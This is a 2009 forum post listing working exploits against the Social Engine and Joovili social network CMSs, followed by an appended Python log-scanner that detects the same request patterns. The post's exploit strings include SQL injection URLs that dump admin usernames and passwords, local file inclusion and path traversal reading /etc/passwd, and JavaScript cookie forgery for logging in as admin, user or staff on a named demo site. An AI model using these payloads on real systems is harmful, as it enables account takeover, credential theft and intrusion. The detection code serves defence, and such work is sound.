[Vulnerabilities] CMS for Social Networks

Discussion in 'Social Networks' started by FraiDex, 22 Jan 2009.

  1. FraiDex

    I suggest using this thread to post vulnerabilities in public engines for social networks. Here are a couple from me:

    Social Engine


    Social Engine (browse_classifieds.php s) SQL Injection Vulnerability


    Exploit:
    Code:
    http://localhost/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
    
    Social Engine 2.0 Multiple Local File Inclusion Vulnerabilities
    Code:
    Exploit: http://[site]/admin/admin_header_album.php?global_lang=[LFI]%00
    Exploit: http://[site]/admin/admin_header_blog.php?global_lang=[LFI]%00
    Exploit: http://[site]/admin/admin_header_group.php?global_lang=[LFI]%00
    Exploit: http://[site]/header_album.php?global_lang=[LFI]%00
    Exploit: http://[site]/header_blog.php?global_lang=[LFI]%00
    Exploit: http://[site]/header_group.php?global_lang=[LFI]%00

    Joovili

    Joovili 3.1.4 Insecure Cookie Handling Vulnerability
    Code:
    demo admin login:
    
    http://demo.joovili.com/admin
    
    demo user login:
    
    http://demo.joovili.com/
    
    demo staff login:
    
    http://demo.joovili.com/staff/
    
    
    exploit for user:
    
    javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/"; 
    
    
    for demo user:
    
    javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";
    
    for demo admin:
    
    javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";
    
    for demo staff:
    
    javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/"
    
    Joovili <= 3.0 Multiple SQL Injection Vulnerabilities
    Code:
    http://localhost/[installdir]/search.php
    
    Search Music:
    
    Exploit 1: 
    
    '+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8+from+joovili_users/*
    
    Exploit 2:
    
    '+union+select+1,2,3,concat_ws(0x3a,admin_username,admin_password),5,6,7,8+from+joovili_admins/*
    
    
    Exploit 1:
    
    http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,username,password),user(),version(),6+from+joovili_users/*
    
    Exploit 2:
    
    http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),user(),version(),6+from+joovili_admins/*
    
    Exploit 1:
    
    http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_users/*
    
    Exploit 2:
    
    http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_admins/*
    
    
    http://localhost/[installdir]/view.group.php?id='+union+select+1,2,user(),4,5,6,7,8,9/*
    http://localhost/[installdir]/view.music.php?id='+union+select+1,2,3,version(),5,6,7,8/*
    http://localhost/[installdir]/view.picture.php?id='+union+select+1,user(),3,4,5,6,7/*
    http://localhost/[installdir]/view.video.php?id='+union+select+1,2,3,user(),5,6,7,8/*
    
    Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability
    Code:
    [<>] Explo!t :
    
    [<>] 1 ====>http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,user(),7,8,9/**/from/**/joovili_admins/*
    
    [<>] 2 =====>http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email),5,user(),7,8,9/**/from/**/joovili_users/*

    Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability
    Code:
    version: 2.***
    include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
    include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
     
    version 3.**
    joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
    joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
    (c) milw0rm.com
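
For operators of the affected engines, detection logic for the request patterns listed in the post above, added here as an example and not part of the original post or of either project's code. It flags UNION SELECT, `..` path segments and null bytes in query parameters of access-log lines; the rule names, the log format and the sample lines are assumptions constructed for illustration, and the matching is heuristic.

```python
import re
from urllib.parse import parse_qsl, unquote
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# UNION [ALL] SELECT with whitespace or /**/ comments between the keywords.
SEP = r"(?:\s|/\*.*?\*/)+"
UNION_RE = re.compile(rf"\bunion{SEP}(?:all{SEP})?select\b", re.I | re.S)
# A ".." path segment bounded by slashes or the ends of the value.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

def fully_decode(value, rounds=3):
    """Undo up to `rounds` further layers of percent-encoding."""
    for _ in range(rounds):
        value, prev = unquote(value), value
        if value == prev:
            break
    return value

def classify(target):
    """Return the sorted rule names matched by one request target."""
    hits = set()
    for _name, raw in parse_qsl(target.partition("?")[2], keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl already removed one encoding layer
        if UNION_RE.search(value):
            hits.add("sqli-union-select")
        if TRAVERSAL_RE.search(value):
            hits.add("path-traversal")
        if "\x00" in value:
            hits.add("null-byte")
    return sorted(hits)

def scan(lines):
    """Return (line_number, request_target, rules) for each flagged log line."""
    flagged = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m and (rules := classify(m.group(1))):
            flagged.append((n, m.group(1), rules))
    return flagged

# Constructed sample requests (documentation IP address, placeholder values).
TARGETS = [
    "/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=12",
    "/browse.videos.php?category=-1/**/union/**/select/**/1,2,3",
    "/header_album.php?global_lang=en%00",
    "/joovili.images.php?picture=../..//../..//etc/passwd&thumbnail=FALSE",
    "/joovili.images.php?picture=%252e%252e%252fetc%252fpasswd",
]
SAMPLE = [f'203.0.113.7 - - [22/Jan/2009:10:00:00 +0000] "GET {t} HTTP/1.1" 200 512' for t in TARGETS]
print(*scan(SAMPLE), sep="\n")
```

Payloads sent in a POST body, such as the search.php form case, do not appear in the request line and need request-body logging or a WAF rule instead.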